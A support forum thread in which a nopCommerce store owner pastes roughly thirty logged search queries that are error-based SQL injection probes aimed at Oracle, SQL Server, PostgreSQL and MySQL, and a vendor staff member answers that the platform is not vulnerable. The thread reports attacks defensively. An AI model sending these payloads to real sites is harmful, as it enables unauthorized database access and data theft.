SQL Injection in Store Search

This topic was automatically closed 365 days after the last reply. New replies are no longer allowed.
9 年 前
Hi Guys,

Since early morning today, we are getting following search queries from our stores. I understand its SQL injection and added a max length check and logic to detect sql injection and prevent it to reach sql server.

but just wanted to know what searching person is trying to understand/study? it is safe to ignore?

Search terms are given below. "Enter Model Number or Cartridge Code" is our default search text box text. IP is suppose to be a German.

Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170

Enter Model Number or Cartridge Code%' AND 4911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(104)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4911=4911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code%' AND 9729=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113)||(SELECT (CASE WHEN (9729=9729) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code%' AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP

Enter Model Number or Cartridge Code') AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND ('SdsF'='SdsF

Enter Model Number or Cartridge Code' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'cvvd'='cvvd

Enter Model Number or Cartridge Code' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'zIAo'='zIAo

Enter Model Number or Cartridge Code') AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND ('lukU'='lukU

Enter Model Number or Cartridge Code' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND 'gvys'='gvys

Enter Model Number or Cartridge Code) AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND (9658=9658

Enter Model Number or Cartridge Code) AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND (2502=2502

Enter Model Number or Cartridge Code%' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code%' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 6528 FROM(SELECT COUNT(*),CONCAT(0x7178696e71,(SELECT (CASE WHEN (6528=6528) THEN 1 ELSE 0 END)),0x71776a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 9422 FROM(SELECT COUNT(*),CONCAT(0x7171686a71,(SELECT (CASE WHEN (9422=9422) THEN 1 ELSE 0 END)),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF

Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ

Enter Model Number or Cartridge Code' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND 'CJnu'='CJnu

Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))-- PYgY

Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))-- TXpN

Enter Model Number or Cartridge Code) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND (8167=8167

Enter Model Number or Cartridge Code%' AND 9841=CAST((CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113))||(SELECT (CASE WHEN (9841=9841) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND '%'='

Enter Model Number or Cartridge Code%' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND '%'='

Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))

Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))

Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))

Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa

Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)
Kind Regards,
Jey

Please up vote if my answer did help you to solve your problem.
0
9 年 前
Hi Jey,

No worries. nopCommerce is not vulnerable to sql injection. Ignore these hack attempts
Interested in the dedicated Premium support services provided by core developers? Please visit https://www.nopcommerce.com/nopcommerce-premium-support-services

Regards,
Andrei Mazulnitsyn
nopCommerce team
0
This topic was automatically closed 365 days after the last reply. New replies are no longer allowed.